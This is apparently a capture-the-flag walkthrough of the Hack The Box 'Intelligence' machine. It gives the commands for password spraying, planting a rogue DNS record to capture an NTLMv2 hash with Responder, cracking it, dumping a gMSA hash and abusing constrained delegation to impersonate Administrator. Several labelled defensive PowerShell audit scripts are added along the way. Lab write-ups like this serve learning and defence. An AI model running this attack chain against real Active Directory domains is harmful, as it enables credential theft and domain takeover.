Link: https://app.hackthebox.eu/machines/357
Uncredentialed Enumeration
TCP Port Scan
Our initial port scan reveals 10 open ports, including SMB, a web server, LDAP, DNS and Kerberos.
SMB Share
Using smbclient -L 10.129.122.188 allows us to log in anonymously, but we cannot see any shares. I also tested some nmap scripts using --script=smb-enum-* and --script=smb-vuln-*. I did get some useful results with --script=smb2*, mainly that the security mode has message signing enabled and required. smbmap fails to provide useful results.
LDAP Enumeration
I attempted to use a Python script for enumeration, but without credentials it fails to bind.
DNS Enumeration
Attempting to use tools such as nslookup, dnsenum and dnsrecon failed to provide useful results.
Web Server
Navigating to the IP over port 80 serves a standard bootstrap template page. There is a form for collecting an email address but it is not hooked up to actually send/collect data.
I performed a gobuster dir scan, which turned up a /documents endpoint with directory indexing off. Attempting to access this directory returns a 403 Forbidden error.
$ gobuster dir -u http://10.129.122.188/ -w /usr/share/wordlists/dirb/big.txt
I also mapped the IP to intelligence.htb in /etc/hosts and performed a gobuster vhost scan to search for any notable subdomains. If not already installed, you can download SecLists from here.
$ gobuster vhost -u http://intelligence.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
This search returned nothing useful.
Looking closer at the source code, everything appears to be stored in the /documents directory. We can also see two files with the format yyyy-mm-dd-upload.pdf. I created a Python script to generate two years' worth of filenames in this format and ran the resulting wordlist through gobuster.
For the file generation:
Now for gobuster:
$ gobuster dir -u http://10.129.122.188/documents -w /home/kali/htb/dates.txt -e > docs.txt
This scan reveals 95 PDF files. Many of these are just Lorem Ipsum text, but a few are noteworthy:
2020-12-30-upload.pdf
Internal IT Update There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts.
2020-06-04-upload.pdf
New Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible.
Using the output from gobuster, I cleaned it up to have one link per line and then used wget to grab all the files:
cd ~/Downloads/docs
wget -i ~/docs.txt
strings 202* | grep /Creator
I copied the results of the grep command into a text file and removed duplicates, which gives us a list of 30 unique accounts:
/Creator (William.Lee)
/Creator (Scott.Scott)
/Creator (Jason.Wright)
/Creator (Veronica.Patel)
/Creator (Jennifer.Thomas)
/Creator (Danny.Matthews)
/Creator (David.Reed)
/Creator (Stephanie.Young)
/Creator (Daniel.Shelton)
/Creator (Jose.Williams)
/Creator (John.Coleman)
/Creator (Brian.Morris)
/Creator (Thomas.Valenzuela)
/Creator (Travis.Evans)
/Creator (Samuel.Richardson)
/Creator (Richard.Williams)
/Creator (David.Mcbride)
/Creator (Anita.Roberts)
/Creator (Brian.Baker)
/Creator (Kelly.Long)
/Creator (Nicole.Brock)
/Creator (Kaitlyn.Zimmerman)
/Creator (Jason.Patterson)
/Creator (Darryl.Harris)
/Creator (David.Wilson)
/Creator (Teresa.Williamson)
/Creator (Ian.Duncan)
/Creator (Jessica.Moody)
/Creator (Tiffany.Molina)
/Creator (Thomas.Hall)
I used this list of usernames with the password NewIntelligenceCorpUser9876 and finally we get a hit with:
- Tiffany.Molina | NewIntelligenceCorpUser9876
Credentialed Enumeration
SMB Enumeration
With our first set of credentials, we can use some tools to get more information, such as smbmap:
$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina -R
This command recursively lists all files in shares that we have read access to.
Notably, we have access to:
- \\IT, which has a downdetector.ps1 file inside of it
- \\Users, which has Administrator, Ted.Graves and Tiffany.Molina folders
- \\Users\Tiffany.Molina\Desktop, which has our user.txt flag
Our access is read-only at most.
We can get access to the user flag with:
$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina --download Users/Tiffany.Molina/Desktop/user.txt
I used the same command to grab the downdetector.ps1 file, which has the following contents:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
# Enumerate every record in the AD-integrated DNS zone whose name starts with "web"
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        # Requests each host with the credentials of the account running the scheduled task
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves [email protected]' -To 'Ted Graves [email protected]' -Subject "Host: $($record.Name) is down"
        }
    }
    catch {}
}
It checks AD DNS every 5 minutes for every record whose name matches web*, requests each host over HTTP with the default credentials of the account running the task, and emails Ted.Graves if the status returned is anything other than 200.
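For contrast, here is a hardened version of the checker, written as an added example and not the script found on the box. It only probes hosts from an explicit allowlist that resolve inside the server subnet, never sends the task account's credentials, and alerts on connection failures instead of swallowing them. The allowlist, the 10.129.122.0/24 subnet and the mail settings are assumptions.

```powershell
# Hardened web checker: constructed example, not the original downdetector.ps1 from the box.
# Assumptions: the legitimate hosts are the two names below, they live in 10.129.122.0/24,
# and mail.intelligence.htb relays alerts.
Import-Module ActiveDirectory
$AllowedHosts = @('web01.intelligence.htb', 'web02.intelligence.htb')   # assumed
$InternalCidr = '10.129.122.0/24'                                        # assumed
$Mail = @{ From = 'it-alerts@intelligence.htb'; To = 'it-alerts@intelligence.htb'
           SmtpServer = 'mail.intelligence.htb' }                        # assumed

function Test-InCidr {
    # True when IPv4 address $Ip falls inside $Cidr.
    param([string]$Ip, [string]$Cidr)
    $net, $bits = $Cidr.Split('/')
    $toInt = { param($a) [BitConverter]::ToUInt32(([IPAddress]$a).GetAddressBytes()[3..0], 0) }
    $mask  = [uint32]([uint32]::MaxValue - [math]::Pow(2, 32 - [int]$bits) + 1)
    return ((& $toInt $Ip) -band $mask) -eq ((& $toInt $net) -band $mask)
}

function Send-DownAlert([string]$HostName, [string]$Reason) {
    Send-MailMessage @Mail -Subject "Host: $HostName is down" -Body $Reason
}

$zone = 'AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb'
foreach ($record in Get-ChildItem $zone | Where-Object Name -like 'web*') {
    $name = "$($record.Name).intelligence.htb"
    # 1. Only probe hosts we know about: a new web* record is an audit finding, not a target.
    if ($AllowedHosts -notcontains $name) {
        Write-Warning "Unexpected DNS record '$name' (check who created it); not probed."
        continue
    }
    # 2. Refuse to talk to anything that does not resolve inside the server network.
    $a = Resolve-DnsName -Name $name -Type A -ErrorAction SilentlyContinue | Where-Object Type -eq 'A'
    if (-not $a -or -not (Test-InCidr -Ip $a[0].IPAddress -Cidr $InternalCidr)) {
        Write-Warning "$name does not resolve inside $InternalCidr; not probed."
        continue
    }
    try {
        # 3. Anonymous HTTPS request: no -UseDefaultCredentials, so no NTLM exchange to capture.
        $resp = Invoke-WebRequest -Uri "https://$name/" -UseBasicParsing -TimeoutSec 10
        if ($resp.StatusCode -ne 200) { Send-DownAlert $name "HTTP $($resp.StatusCode)" }
    } catch {
        # 4. A connection failure is exactly the outage we want to hear about; do not swallow it.
        Send-DownAlert $name $_.Exception.Message
    }
}
```

The unexpected-record warning is the useful signal here: the original script would instead have authenticated to that host.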
LDAP Enumeration
I reused the python script from earlier with credentials to get information on ldap:
$ python3 ad-ldap-enum.py -d intelligence.htb -l 10.129.122.188 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
This script drops a few .tsv files that give us more information about which users are in which groups. The most important for us are the following:
dba Jeremy.Mora NORMAL DONT_EXPIRE_PASSWORD
itsupport Ted.Graves NORMAL DONT_EXPIRE_PASSWORD
itsupport Laura.Lee NORMAL DONT_EXPIRE_PASSWORD
sysadmin Jason.Patterson NORMAL DONT_EXPIRE_PASSWORD
Domain Users Administrator NORMAL DONT_EXPIRE_PASSWORD
Domain Guests Guest DISABLED NORMAL DONT_EXPIRE_PASSWORD
Domain Users krbtgt DISABLED NORMAL DONT_EXPIRE_PASSWORD
...
Domain Users Tiffany.Molina NORMAL DONT_EXPIRE_PASSWORD
The operating system displays as Windows Server 2019 Datacenter 10.0 (17763).
I also installed JXplorer and used [email protected] as the username for a GUI way of searching through the directory, but I did not find anything of use on any of the users.
Capture the Hash
Our current user account is a basic account with only read access, so we need to find another account to pivot to. The PowerShell script we found searches AD DNS for any record starting with "web" and requests each host with the credentials of whoever runs the scheduled task (it only emails Ted if that request fails). If one of those records points at us, we can capture the request with Responder and take the NTLMv2 hash of the user trying to connect.
Phase 1 is adding a DNS record into AD whose name starts with web and points back to our attacking machine. I found a GitHub repository with a Python script (dnstool.py) we can use to do this. Our attacking IP is the one ending in xxx.
$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web123.intelligence.htb -d 10.10.14.xxx 10.129.122.188
Phase 2 is starting Responder to catch the connection:
$ sudo responder -I tun0 -A
Now we wait until that script runs within 5 minutes and we get a hit!
[HTTP] NTLMv2 Client : 10.129.122.188
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:8a9face4ef7cdc7b:EB65005B0492CBA111472146584E5F65:0101000000000000201FB8A9F89DD701789418BC2F40E95C00000...00000000000000000000900380048005400540050002F007700650062003100320033002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
NTLMv2 includes a time-based response so I don’t think we will be able to do a Pass the Hash attack.
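From the defender's side, the record added in Phase 1 is visible in the zone itself: a dnsNode created by an ordinary user is owned by that user, because Authenticated Users can create child objects in an AD-integrated zone by default. The following audit, written here as an added example rather than anything from the write-up, lists records whose owner is not one of the expected administrative principals. The trusted-owner list is an assumption to adjust per environment.

```powershell
# Constructed audit script, not from the write-up: flag DNS records in the AD-integrated zone
# whose owner is not an expected admin principal (i.e. records an ordinary user may have added).
Import-Module ActiveDirectory

$zoneDn = 'DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb'
# Owners we expect for legitimately created records (assumed; adjust to your environment).
$trustedOwners = @('INTELLIGENCE\Domain Admins', 'INTELLIGENCE\Enterprise Admins',
                   'INTELLIGENCE\DnsAdmins', 'NT AUTHORITY\SYSTEM')

function Get-SuspiciousDnsRecord {
    param([string]$ZoneDn, [string[]]$TrustedOwners)
    Get-ADObject -SearchBase $ZoneDn -SearchScope OneLevel -Filter { objectClass -eq 'dnsNode' } `
                 -Properties nTSecurityDescriptor, whenCreated, whenChanged |
      ForEach-Object {
        # The security descriptor's owner is the principal that created the node.
        $owner = $_.nTSecurityDescriptor.Owner
        [pscustomobject]@{
            Name    = $_.Name
            Owner   = $owner
            Created = $_.whenCreated
            Changed = $_.whenChanged
        }
      } | Where-Object { $TrustedOwners -notcontains $_.Owner }
}

# Newest records first: a fresh web* node owned by a regular user is the finding to chase.
Get-SuspiciousDnsRecord -ZoneDn $zoneDn -TrustedOwners $trustedOwners |
  Sort-Object Created -Descending | Format-Table Name, Owner, Created, Changed -AutoSize
```

Removing the Create Child right for Authenticated Users on the zone (or switching it to secure dynamic updates from computer accounts only) closes the path the write-up uses.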
I copied the hash and echo'd it to hash.txt.
Now we can use hashcat to attempt to crack the hash. The mode for NTLMv2, taken from hashcat's example-hash list, is 5600.
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o hash_cracked.txt
After a few moments, we get the password written to our output file.
SMB Enumeration – Again
Now let's check what we can find in Ted.Graves' directory on the machine:
$ smbmap -p ... -H 10.129.122.188 -u Ted.Graves -R
I don’t see anything of use here.
Escalation
Get NT Hash for Service Account
In the note we read before, there was a mention of service accounts being locked down. I found a GitHub repository with a script, gMSADumper.py, that dumps the Group Managed Service Account passwords readable by a given user:
$ python3 gMSADumper.py -u Ted.Graves -p ... -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
This gives us the NT hash for svc_int$. Now we can use some impacket tools to further our cause.
Exchange Hash for Kerberos Ticket
Impacket has a tool named getST.py that, "Given a password, hash or aesKey, it will request a Service Ticket and save it as ccache". On Kali, I ran cd /opt/impacket/examples to find the script.
Looking at the options, we need the SPN of the target service to generate a ticket for. Using Ted's credentials, let's investigate LDAP once more. A Microsoft help article tells us what to look for in AD: the ms-DS-Allowed-To-Delegate-To attribute.
I fired up JXplorer and navigated to the Managed Service Accounts section, where we see the svc_int account. Under the Table Editor we can find msDS-AllowedToDelegateTo with the value we need: www/dc.intelligence.htb.
We need to be sure to add dc.intelligence.htb to our /etc/hosts file now.
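The chain from gMSADumper to getST works because three things line up: a broad group (itsupport) may read the gMSA password, the gMSA is allowed constrained delegation to a service on the DC, and the Administrator account is not marked as sensitive. The audit below, an added example and not part of the write-up, surfaces all three from the defender's side so the combination can be broken (narrow the password readers, or set AccountNotDelegated / Protected Users on privileged accounts). The list of privileged users to check is an assumption.

```powershell
# Constructed audit, not from the write-up: list every gMSA with who can read its password and
# where it may delegate, then report privileged users that are not protected from delegation.
Import-Module ActiveDirectory

function Get-GmsaDelegationRisk {
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword,
            'msDS-AllowedToDelegateTo', TrustedToAuthForDelegation |
      ForEach-Object {
        # Resolve the reader DNs to names so "itsupport" is readable in the report.
        $readers = @($_.PrincipalsAllowedToRetrieveManagedPassword |
                     ForEach-Object { (Get-ADObject -Identity $_).Name })
        $targets = @($_.'msDS-AllowedToDelegateTo')
        [pscustomobject]@{
            Account            = $_.SamAccountName
            PasswordReaders    = ($readers -join ', ')
            DelegatesTo        = ($targets -join ', ')
            # Protocol transition lets the account obtain a ticket as any user without that
            # user ever authenticating to it; combined with delegation targets this is the risk.
            ProtocolTransition = [bool]$_.TrustedToAuthForDelegation
            Risky              = ([bool]$_.TrustedToAuthForDelegation -and $targets.Count -gt 0)
        }
      }
}

function Get-UnprotectedPrivilegedUser {
    # Accounts to check are an assumption; extend with your Tier 0 admins.
    param([string[]]$SamAccountNames = @('Administrator'))
    foreach ($sam in $SamAccountNames) {
        $u = Get-ADUser -Identity $sam -Properties AccountNotDelegated, MemberOf
        $inProtectedUsers = @($u.MemberOf | Where-Object { $_ -like 'CN=Protected Users,*' }).Count -gt 0
        # Either flag makes the KDC refuse S4U2Proxy for this user, so impersonation fails.
        if (-not $u.AccountNotDelegated -and -not $inProtectedUsers) {
            [pscustomobject]@{ User = $u.SamAccountName; AccountNotDelegated = $false; ProtectedUsers = $false }
        }
    }
}

Get-GmsaDelegationRisk | Where-Object Risky | Format-Table -AutoSize
Get-UnprotectedPrivilegedUser | Format-Table -AutoSize
```

Against this domain the first query should show svc_int$ with itsupport among its password readers and www/dc.intelligence.htb as its delegation target, which is exactly the pair used in this section.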
Now with the SPN, we can use it as such:
$ python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Unfortunately, the time of my Kali VM differs too greatly from the Windows machine's time, so we need to sync them. We can do so using ntpdate.
IMPORTANT NOTE: I am using Parallels on a Mac, so I had to change a Parallels setting for it to work:
$ sudo apt-get install ntpdate
$ sudo ntpdate 10.129.122.188
30 Aug 20:18:30 ntpdate[56371]: step time server 10.129.122.188 offset +25199.774292 sec
Now if we rerun the command above for the service ticket:
Now that we have a service ticket for the Administrator account, we have a couple of different options to connect. I am going to connect via impacket's smbclient.py:
$ smbclient.py -k intelligence.htb/[email protected] -dc-ip 10.129.122.188 -no-pass
Now that we are connected, we can run a few commands to navigate to the Administrator's desktop:
# shares
# use C$
# cd Users
# cd Administrator
# cd Desktop
# get root.txt
It will download root.txt to whatever directory you were in when you ran the smbclient.py command. For me it was ~/htb.
Conclusion
This machine was really difficult for me and I learned a lot of new tools. I had done a Golden Ticket before on TryHackMe, but the process was very fuzzy, so I had to keep researching what to do next. Writing a custom script to discover and download files and build a wordlist of usernames was very cool.
This felt a lot more realistic in that we found one account but had to pivot to another account, and then another, in order to finally get the flag. A lot of corporations use Windows machines, so the experience of using impacket to obtain a service ticket was very useful knowledge that I am sure will be more useful in the future.